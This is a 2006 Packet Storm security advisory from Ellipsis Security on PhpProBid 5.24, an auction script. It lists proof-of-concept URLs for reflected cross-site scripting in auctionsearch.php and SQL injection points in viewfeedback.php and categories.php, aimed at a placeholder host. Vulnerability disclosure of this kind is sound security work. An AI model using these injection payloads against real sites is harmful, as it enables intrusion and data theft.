phpprobid524.txt

2006-07-28T00:00:00
ID PACKETSTORM:48628
Type packetstorm
Reporter ellsec.org
Modified 2006-07-28T00:00:00

Description

                                        
                                            `Phpprobid 5.24  
http://www.phpprobid.com  
--------------------------  
Cross Site Scripting (XSS)  
--------------------------  
http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script>  
http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>  
-------------  
SQL injection  
-------------  
http://target.xx/viewfeedback.php?view=1'[SQL]  
http://target.xx/viewfeedback.php?view=all&start=1'[SQL]  
http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL]  
-----------------  
Ellipsis Security  
http://www.ellsec.org  
`